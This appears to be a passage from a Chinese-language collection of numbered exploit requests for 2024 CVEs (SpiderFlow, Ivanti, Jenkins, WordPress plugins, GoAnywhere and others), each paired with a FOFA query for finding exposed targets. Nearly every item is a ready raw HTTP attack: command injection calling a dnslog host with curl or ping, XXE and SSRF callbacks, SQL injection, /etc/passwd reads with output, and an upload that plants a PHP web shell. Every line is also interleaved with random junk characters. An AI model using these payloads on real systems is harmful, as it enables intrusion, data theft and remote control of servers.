7 B  C2 ^' H& ~# O* F0 |$ D/ e98. SpiderFlow爬虫平台远程命令执行4 a# w9 p' u/ g
CVE-2024-0195
- M; B/ v5 J# @7 e$ j8 s: T+ dFOFA:app="SpiderFlow"
8 t3 N- A! A* S: r# `POST /function/save HTTP/1.1! _8 m# a  W4 l
Host: 192.168.40.130:8088
/ t  l4 m4 ^* v% [& Y7 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& k9 e7 U% O$ w
Connection: close3 N/ S9 Q5 w, h: \& m
Content-Length: 121
# S1 c$ `, }; y- i/ AAccept: */*
! l" X! g: K$ {2 R8 _# ]2 p( {Accept-Encoding: gzip, deflate: g5 S" w( ]! q/ ]
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 i$ z/ o* Z( k4 ^# `Content-Type: application/x-www-form-urlencoded; charset=UTF-8
3 H/ m3 I% S8 k, DX-Requested-With: XMLHttpRequest  E. a% P) X7 G5 K9 K

. \( H  O) ^8 ?' I" w  i+ R; vid=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
. q+ F/ J+ L; p+ p
! R' b+ P7 `% W% O+ U4 |8 F" m* |, ~& x9 j/ E5 c5 ?
99. Ncast盈可视高清智能录播系统busiFacade RCE
/ J& I/ Q( I& N+ ^- a' dCVE-2024-0305
; Y. q2 k7 D2 I) lFOFA:app="Ncast-产品" && title=="高清智能录播系统"
* r1 }  p/ D( F/ yPOST /classes/common/busiFacade.php HTTP/1.1
8 H8 x; x# z5 w- i3 pHost: 192.168.40.130:8080' x2 K4 V$ {8 `- G& r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 [+ K+ u# \2 j/ n/ WConnection: close
) K5 p* G8 l8 o; p0 y" P% q( UContent-Length: 154* }7 p- y2 R2 H& Y0 _- x2 A
Accept: */*( C  h( N8 i) |; V
Accept-Encoding: gzip, deflate2 T: [) ?' C5 ^
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: Z, Z! [) s3 iContent-Type: application/x-www-form-urlencoded; charset=UTF-86 a. h* `7 K& Z8 w; |! y2 ]( `
X-Requested-With: XMLHttpRequest+ u5 G7 d5 T% S2 b9 _6 Q) q

2 H2 S( ?& I3 s%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
/ |) a3 E. s1 s. j! J2 L* C5 \' f8 z+ A$ f7 V

4 L/ s$ \3 X) `! D100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
* {6 D$ E! t% Q# PCVE-2024-0352: ~) }2 e8 C; @. A& N
FOFA:icon_hash="874152924"
) l; I$ c- _/ y9 b& XPOST /api/file/formimage HTTP/1.1+ Z; D& e7 C0 Z) W! _6 U  \$ }$ g
Host: 192.168.40.130/ H4 L8 j4 B) j
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.364 p3 f* _9 E/ S' R  n
Connection: close
- J/ j2 q' V/ w( [Content-Length: 201
8 I' c6 D% B' d3 ]3 Z3 vContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei, g- ^$ J' I3 f
Accept-Encoding: gzip6 h+ ]& D0 w. s: @" P
1 Y8 F! M7 t5 D
------WebKitFormBoundarygcflwtei
9 G* n5 x* K& |8 @9 XContent-Disposition: form-data; name="file";filename="IE4MGP.php"
  u) V5 U; k0 z  y# sContent-Type: application/x-php
8 D, M( A% V8 K8 ~( w
3 W1 L9 Y8 B# ?, ^1 s2ayyhRXiAsKXL8olvF5s4qqyI2O# k: ?: v. z9 l7 Y# @- Y; N
------WebKitFormBoundarygcflwtei--
9 ]2 z5 O* F2 H5 u( f) |' q) D) H8 u( w
" y% Y# @" a. O" N) `0 j
101. ivanti policy secure-22.6命令注入7 X1 @/ B* x/ |  m# D; V/ t# |1 l  j
CVE-2024-21887: }0 p4 k% Y3 c3 }! u
FOFA:body="welcome.cgi?p=logo"
/ _+ C$ }" i( u$ ~  d4 OGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.16 Z5 |/ [9 S3 G: P8 ]
Host: x.x.x.xx.x.x.x
" `6 `- e5 Z# w0 j" I, d4 ?- q' [User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
- u% J8 y# j# N5 I3 h2 o9 U' g6 QConnection: close% W( V3 I# e) t+ {" c, [9 s
Accept-Encoding: gzip4 @( X* E  a2 c, ~
4 T& g. B% X. ?7 b" s$ U

  z; k& V1 P) g0 R0 m102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行! N7 n: R! {2 L; W1 d. _
CVE-2024-21893& ]5 J# g0 e: H, [+ o+ ~. j
FOFA:body="welcome.cgi?p=logo"
# Y2 K2 e" G. ]POST /dana-ws/saml20.ws HTTP/1.1, X3 p, W9 Y/ P2 `. ?" T" b) b6 S7 W
Host: x.x.x.x. b% Y- Y: t: T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.360 `& ]6 q! e4 Y8 B8 J0 I% N
Connection: close$ s& l/ N( E5 P: h
Content-Length: 792
% f9 ?6 S# N: e# S# w7 XAccept-Encoding: gzip( O4 u: w2 W' S; _* I! B# w+ K% X1 e
4 C4 r& U: M% i( ~! \
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>, |' A- {4 A, O2 S

  g7 Q3 s, r2 Y0 S3 ?: P103. Ivanti Pulse Connect Secure VPN XXE  a, _& T4 m& v
CVE-2024-220241 ~* W) E  o, k" h2 |9 F: r
FOFA:body="welcome.cgi?p=logo"7 r" A0 H( x2 K+ P$ A
POST /dana-na/auth/saml-sso.cgi HTTP/1.1/ Q. O) A) f% V% k  I4 H
Host: 192.168.40.130:111) V: ~% @* S) Q" M8 T! d
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( Z' p+ f% p3 t7 T
Connection: close7 ~6 [" Z( D* L/ x, [$ V6 ^
Content-Length: 204  g. z* k1 L" [+ E1 N0 |' C
Content-Type: application/x-www-form-urlencoded
$ u/ Q. D8 S3 O+ E4 UAccept-Encoding: gzip- T/ ^7 Q5 U6 q' ^6 G
5 b8 l9 Q3 [# m% d- U
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
% l  s7 [7 D) T0 n7 y( a( g
9 o- P- Y: V9 y! K9 O$ C1 {& ~6 X9 P0 F
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
4 o0 K' P) o3 E- o<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>+ {2 D( ^* i6 T' T" m2 L5 ]" d

$ ?1 y% X/ x3 d; E  B+ e, T$ \  G" J/ A0 @. V8 ]
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
; \% q8 M! \1 B: @- BCVE-2024-0569
$ R: |! B) I5 y1 }  s( w/ l3 R, cFOFA:title="TOTOLINK"
9 R+ O$ y' I* kPOST /cgi-bin/cstecgi.cgi HTTP/1.1
/ R) q% \; P! n4 O, D. vHost:192.168.0.1" y' h2 |; p4 }! W1 w
Content-Length:41
& c# [2 {- y  l1 b' g. `$ VAccept:application/json,text/javascript,*/*;q=0.01
6 P" M+ o( t- C; y# WX-Requested-with: XMLHttpRequest
; q' K7 w8 \% [" a2 RUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36  X' s" B& U3 H/ W6 e& i; g
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
" S2 X" f2 A6 ?: IOrigin: http://192.168.0.1
& \, Z0 U, {) T" b: _, AReferer: http://192.168.0.1/advance/index.html?time=1671152380564
& R1 U2 |& p) o; h' Y* vAccept-Encoding:gzip,deflate
) X' [; ~1 n7 o$ b* ^Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
1 ]) B' c# J3 L" O- VConnection:close/ a+ p& j0 j3 s( b
2 J3 S# a$ t' e5 V
{- |8 t" c9 l$ b
"topicurl":"getSysStatusCfg",- t( J, ?7 h) d' ~4 a( P
"token":""
( z" L% k# S7 _/ x5 Q( g* I}' |2 J. T2 h  h3 Y- ~) J

  {: A5 r4 T) L$ @105. SpringBlade v3.2.0 export-user SQL 注入
) g$ \$ x+ F+ ^; E2 H  j! lFOFA:body="https://bladex.vip"
- ^( B' H% B! [. b' F- |http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1: [6 ?! ?# n9 t2 X# g

2 @1 G, y! j, f. p1 c106. SpringBlade dict-biz/list SQL 注入  p' `4 v7 L/ N9 ?7 n% g
FOFA:body="Saber 将不能正常工作": F* D3 d% H7 d3 P1 D% h' x
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
4 ?; {* ]$ a: c1 PHost: your-ip
( u0 ]: e* M, {7 r  OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! j% K9 W% e4 }2 ?* K1 m/ A2 x1 W
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A7 g( ~% b& ~8 T. J1 h+ C* z1 s  N
Accept-Encoding: gzip, deflate
9 N) T& [+ K) B5 \6 H- Q; X& r3 a/ p1 \Accept-Language: zh-CN,zh;q=0.9
: F" @" }6 K2 T. M) tConnection: close
1 B: Q) _0 b4 a; w0 P- O, D
; g1 t6 D4 A" A, M% `
$ [; u; G) w7 B6 a107. SpringBlade tenant/list SQL 注入) ?0 I3 |- y% T6 I3 C/ u, Q
FOFA:body="https://bladex.vip"
) K1 N/ q; S! g1 z9 ]% eGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, O3 t7 N7 [9 a) h2 cHost: your-ip+ N) k  d& q8 w! C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
# K7 `  Q! i! _2 |9 L% n8 M, P7 y3 zBlade-Auth:替换为自己的# N- Q" _% M: r+ i' U8 |% {1 }
Connection: close& j% B$ z. z1 u. a2 D: z8 M' F/ a
6 K4 x, ^" w, Y) z

" A' C! u9 E7 u% K( r/ f2 w108. D-Tale 3.9.0 SSRF! K( L- @( n# L$ L" y
CVE-2024-216428 R- U5 D8 P  U- s$ _
FOFA:"dtale/static/images/favicon.png"  G/ ?8 ~2 a; ~1 I0 g. s0 _2 y
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
4 ]- d: d2 I- p+ WHost: your-ip
2 e2 G9 A- P, g0 h/ AAccept: application/json, text/plain, */*
5 d1 t5 K; G, t- j4 A( aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" Y) X$ F1 O  R( m( Q5 F
Accept-Encoding: gzip, deflate
/ [4 n; K& \& V* d+ \" cAccept-Language: zh-CN,zh;q=0.9,en;q=0.8
* ~8 X; l4 T" `; e& ?Connection: close. B# p* e. O' S" x3 \

8 [" x! {) m; ^( @8 h) l8 p, Q; W' G# ]+ x
109. Jenkins CLI 任意文件读取
9 F& {5 q% y0 |1 f. Z5 K8 O7 DCVE-2024-23897+ P, V) z5 _/ P6 d/ w6 d; `
FOFA:header="X-Jenkins"
- F% }7 ]( q4 X5 k# ^3 r% u  g2 f- xPOST /cli?remoting=false HTTP/1.1
% R) ?; u1 t" G& |( c6 t2 ^Host:7 q, \. Q8 a1 J; \
Content-type: application/octet-stream
6 q& i! S2 q/ F+ wSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92+ A( O1 ]# `# L
Side: upload
/ g* }: o" F* _. q7 HConnection: keep-alive
8 L# {, t  ?  r4 qContent-Length: 163
  F! f( s( T0 t$ E- x: J
# s0 @2 w) [$ y& O$ m) Wb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
9 Q$ h" O: k3 R( M, F) l
+ }/ Q, ?! T1 d3 l8 Q
* M3 a$ M+ _3 _8 YPOST /cli?remoting=false HTTP/1.1; W& T% i* _' x* t- q4 P, ^! n# X
Host:* Y$ }- o1 H2 \( x
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
; }* S8 {; @# Ddownload( ^/ j' h' _8 p9 C* b6 v% |
Content-Type: application/x-www-form-urlencoded3 S8 d  {0 ]* o5 a& `4 b* \# X
Content-Length: 0  V. u* l% R+ P9 K/ R' h/ }* H

0 K4 s1 C7 E# L; D2 B0 n6 N) Q# p4 r
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
3 `; a( L+ @- a4 Q. wjava -jar jenkins-cli.jar help0 n$ B' w, e, q0 W3 D5 W& s0 Y& ?
[COMMAND]7 e4 z$ R) j2 `6 j, ~3 v$ i
Lists all the available commands or a detailed description of single command." o: W6 q! ^& [, ^' E
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)! B& l: X9 u$ d, j. N& l
  l1 M1 _2 R' X% P9 q! }5 a

+ H! e+ \, u: E9 {: L& I110. Goanywhere MFT 未授权创建管理员
  h! r8 I+ k, J, RCVE-2024-02042 y+ c( M# N9 |5 s7 A( _
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"0 t$ D/ N: L3 T$ p
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.17 w4 N2 V. |/ q; z$ U
Host: 192.168.40.130:8000- c5 d8 ~  J& q% `
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
  N* h3 o  \6 bConnection: close
5 B3 ~3 y% f& {/ ~" p/ [; J% MAccept: */*; W3 l* u# Q9 }/ k! h; C
Accept-Language: en# N8 l( A' T8 o% I8 e$ {
Accept-Encoding: gzip
- u, u. A, Z, {1 k. b$ S  ^, G5 B' ^+ H1 Y8 H5 y9 s
, `5 r4 S5 M5 Q/ }5 g7 ^6 t
111. WordPress Plugin HTML5 Video Player SQL注入3 P0 a- p7 ]) v1 x
CVE-2024-1061
7 K' n  r  l' a# A7 bFOFA:"wordpress" && body="html5-video-player"' y6 U( x+ o4 S  t" Q, f; u
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1: H& c1 T) S: R# X* L3 E
Host: 192.168.40.130:112
! i, J! x/ Q, x8 ^User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
) y. \) `* Z- u6 GConnection: close
* m; y! g5 t! GAccept: */*
$ Q! H- a( W! bAccept-Language: en& N& N7 W* l0 ?! W4 p$ s- |
Accept-Encoding: gzip
2 h4 g5 \- k! }
* ^* u9 a* n+ u! ^
- R$ @4 o; Z- B+ D1 j112. WordPress Plugin NotificationX SQL 注入
4 |% v/ K( M6 K  E* Q+ l# }" G. mCVE-2024-1698
  z0 F; Z6 }, y9 ?* nFOFA:body="/wp-content/plugins/notificationx"
; a2 z! w  _$ r" }$ E- iPOST /wp-json/notificationx/v1/analytics HTTP/1.1
, w' J# F9 p! o' f) KHost: {{Hostname}}4 }( l7 J- j5 _( ~2 D" q( r+ V
Content-Type: application/json5 j5 T+ h9 h# B# n& j/ I

* N. u, `0 b9 i; \8 |" ^4 O+ r{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
8 F, f6 y1 h6 h, G2 L5 l# L1 Z: `1 f
9 @5 T. j. S3 c' X, T6 p! \+ W; z9 B! H" F3 P) y
113. WordPress Automatic 插件任意文件下载和SSRF
, [' M" A! g. _; QCVE-2024-27954: ^. u; B7 @1 l+ {/ E7 H
FOFA:"/wp-content/plugins/wp-automatic"
1 N5 G" G& V4 B, K* u; R+ `- QGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
2 c! f4 O  E( r6 lHost: x.x.x.x
+ W/ m$ J5 O8 W( |7 dUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36% Q4 Q0 @4 `1 a5 [4 {/ _6 V2 e
Connection: close7 M# M, I- x9 x7 S" G
Accept: */*4 c' c6 t2 ^- U
Accept-Language: en1 P; W/ j' l3 |& ^
Accept-Encoding: gzip
/ }$ Z0 r7 S: }. v2 K( D
9 J* x! N8 q+ ^3 n* m) B6 L" P! Y$ |- ]/ R
114. WordPress MasterStudy LMS插件 SQL注入3 z7 k& p7 O2 Y% [, v: V
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/") x" \1 c! R$ V1 F% w
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
% g7 a" x) P" t- @Host: your-ip/ I3 a" u* o0 H& k3 m3 m
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
5 o. e: K1 \, Q7 E# F; \* Q9 GAccept-Charset: utf-8
7 j( n5 a/ z1 D. M: f' E4 ]& ~Accept-Encoding: gzip, deflate2 |# }4 ~2 w+ b7 M: Z
Connection: close+ Y" p0 V$ q' M  E8 B3 O3 Y4 K
( c4 g; {& T/ T# f

4 u" p9 X# G5 w0 f9 f+ @* q6 a115. WordPress Bricks Builder <= 1.9.6 RCE
# d8 i- s3 T. y, v: Q. f) R  Z$ [CVE-2024-25600" |8 |& s' c! v3 q' C' I
FOFA: body="/wp-content/themes/bricks/"
/ o" S" R3 g5 Z& d8 u, W5 A/ T第一步,获取网站的nonce值
: ?! x1 i: \8 W2 V( l  d' ~( pGET / HTTP/1.1( _5 T. ^( w/ x3 y6 u, E$ s
Host: x.x.x.x# K% l  T$ q5 f( q, P
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 g7 G3 ?& O7 t7 E# s* x: g
Connection: close; W, e+ q# d  O
Accept-Encoding: gzip) |" \+ b/ a  `6 G0 x/ C& e5 D& J( m
2 O* q0 O) q8 Y4 \$ B/ j7 D" M( y

9 v# q7 c6 Y2 p3 v5 x% o+ l3 c9 ~第二步替换nonce值,执行命令
0 Y) A+ o2 Q  g0 u8 |POST /wp-json/bricks/v1/render_element HTTP/1.1
3 P: b$ x8 e, c# h. @. V5 N$ hHost: x.x.x.x4 ]3 l9 Z5 U1 ~9 {
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
4 V- N& [- z3 S" `# L# Y+ RConnection: close
1 q1 E1 s/ T/ F" u5 @2 n& E  f  yContent-Length: 3566 V* R9 `/ R" p: E; U
Content-Type: application/json
: \: b) d1 R8 WAccept-Encoding: gzip# R$ g1 K4 ?1 u; `. M  }
$ B9 V% P' K  o1 O$ T% l* }4 _
{: L3 ~7 q9 F4 f$ Z
"postId": "1",
9 s  ]; H& i6 w3 M+ Z; i* z- s1 `  "nonce": "第一步获得的值",% r0 F9 R" w! `
  "element": {
0 ]+ `6 g: Q  h# e8 @$ r    "name": "container",
" R: z0 O& }0 C- o8 E' E    "settings": {% c4 l1 Q) n" x
      "hasLoop": "true",: K6 [  m; C4 ]+ y- Q  e* u1 b
      "query": {
5 a8 ?, S" N' A' S2 ^        "useQueryEditor": true," A& t) E5 O+ Y' F6 H, F+ e! ~$ y
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
1 k. v0 F, k- p* s% ]% x        "objectType": "post"8 ]7 e9 w8 s& V' l- N) g
      }
5 I5 B+ O- T/ C1 X5 d( g7 B: P8 {    }
9 _, F3 Y7 ~' f5 U* t  }
5 J5 G6 r2 h9 b3 _$ R}7 d4 R' e$ H" e( Z
, y" l: s4 D0 A  _( ^2 s: W
( C; u8 D& K& l$ y- V" i
116. wordpress js-support-ticket文件上传/ o' k/ v) ~: t4 L+ W  ?
FOFA:body="wp-content/plugins/js-support-ticket"
/ L3 h: {& V2 t  U% j# L) kPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
% Q6 Y% |" M3 c( i1 t% OHost:8 h! s6 t4 X" L+ S/ U9 k+ K
Content-Type: multipart/form-data; boundary=--------767099171" K9 a8 P! d3 t) g+ v
User-Agent: Mozilla/5.0
0 Z8 E# Q7 x; z* i+ n/ O" Y6 }, I
% r7 s9 ~$ V+ u/ }& k1 \----------767099171
/ V8 u4 p- E) l% W" bContent-Disposition: form-data; name="action"- R: M, P- H0 e2 O
configuration_saveconfiguration
$ q3 X1 e8 j4 b6 n7 I( h  C----------767099171
- T% D6 R$ C7 P( JContent-Disposition: form-data; name="form_request"
( v* _* _+ Q, q& g0 `' Djssupportticket
& m$ A8 `9 L- e) e----------767099171
& w! s  s" O6 `8 gContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"5 l1 b- Z: n" S+ l, M
Content-Type: image/png
8 x5 ~4 N* r, D5 u1 X----------767099171--
. O4 ]2 c/ H3 j( ^6 n0 j. J8 e: R5 W, A+ ?" C2 R
7 {4 \6 u( o( ]% E; u$ G! ]
117. WordPress LayerSlider插件SQL注入# ^, \! v2 K7 @) [
version:7.9.11 – 7.10.0
2 S5 B4 U. W; i: hFOFA:body="/wp-content/plugins/LayerSlider/"
8 D( q& f# O! Q7 a% B& m5 R2 v) aGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
: `! }3 y" G0 |Host: your-ip
$ y9 w1 ^( Q( aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
! n4 N! @% Y+ ^1 o1 R3 Q! iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 I7 q. z7 j4 W3 M4 ^4 ?8 m  k+ kAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% O( Q& p5 d+ v/ ^' R
Accept-Encoding: gzip, deflate, br
& [2 @8 n# U8 HConnection: close
  K' {+ d9 H4 y$ mUpgrade-Insecure-Requests: 1% P# S1 O* D, l6 ~2 F# v
9 P* l; n( a. l) S" h3 T6 I5 s8 C

. x' o) P6 r; i7 r! x* ~9 u: L118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
( ^  }7 ]9 s0 Q) i! ?CVE-2024-0939. u5 L: ]; [+ U2 J
FOFA:title="Smart管理平台"
) u4 j) P. l6 C" \; i% h) JPOST /Tool/uploadfile.php? HTTP/1.1
5 h$ P  h" t" G5 h2 EHost: 192.168.40.130:8443
1 T8 U) L, L- w$ ]+ o. lCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
& h. z0 I) l' h, q( r4 k! q8 BUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
1 p5 j3 u) S  w2 F7 s2 i5 A. J1 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.80 J5 t( G3 i1 c6 a/ V8 h1 d9 h0 g
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2& Y, t6 S6 D$ }1 a" O
Accept-Encoding: gzip, deflate
' I$ a$ V( u8 R: u4 oContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
) t: Q/ H( z9 HContent-Length: 405
: q- \& J& y5 bOrigin: https://192.168.40.130:8443
- @0 ^- P3 c1 W: R$ [Referer: https://192.168.40.130:8443/Tool/uploadfile.php
( k. o! r  [1 B* c; |Upgrade-Insecure-Requests: 1' e) j; O" ^% E: i8 |" {
Sec-Fetch-Dest: document* Y5 K: ~4 B9 O5 x+ C8 M# A
Sec-Fetch-Mode: navigate
: P; Q+ `3 Y$ n0 Z; A* ]+ XSec-Fetch-Site: same-origin
! O: v$ A+ b% n) x) g& x" RSec-Fetch-User: ?13 B; ]9 F0 D+ q3 }, D+ m+ L
Te: trailers$ ~+ }/ ]2 h' v7 i  p, a8 s
Connection: close4 @. v9 Y0 P: o0 {1 L

. i$ p. _# \( O- M7 |0 E-----------------------------13979701222747646634037182887
% u2 L; D! P2 X, ]! _$ M8 cContent-Disposition: form-data; name="file_upload"; filename="contents.php"" }& K2 o$ A2 C5 t2 z# B" R
Content-Type: application/octet-stream
& f8 K2 U4 \1 Y1 t5 U* f
+ X) P; }# c8 i. H<?php! \+ ?  R( I  H( {
system($_POST["passwd"]);
1 z/ Y" D! @. W5 ^& d" N?>
! Y6 C4 j  i$ Z5 K: w0 [' x# U-----------------------------13979701222747646634037182887
$ k5 h* Q9 g* V) [% N3 _7 E' I$ hContent-Disposition: form-data; name="txt_path"
1 y2 m6 v: f8 k, o' q7 H, ^0 e- E2 B5 R
/home/src.php
2 D! V( {( t5 L1 v-----------------------------13979701222747646634037182887--
& |+ j$ F, a6 ?: F% R* N* o' J$ g* _
' E8 n5 k7 u7 Z* R6 Z6 I
$ J0 Q3 D& w7 k8 F: U8 }访问/home/src.php
& G( w8 _  d' U& q5 T$ w& Y
* M0 t, u. b. \8 p1 _7 v119. 北京百绰智能S20后台sysmanageajax.php sql注入
3 Z$ L1 C! N% O, x6 @- pCVE-2024-1254
1 Z7 B" Z8 f( l8 U6 oFOFA:title="Smart管理平台"
" d( g1 [6 \' {( l先登录进入系统,默认账号密码为admin/admin7 _* s& x+ t8 n- K+ H7 s* |/ s
POST /sysmanage/sysmanageajax.php HTTP/1.11
4 ^- S+ p, r; E% @, j2 m  E6 x7 c' `Host: x.x.x.x$ X# K9 k9 n9 _) J( n, y' P
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
4 c, _4 v( w: C% v+ D% x" _% U7 P$ SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
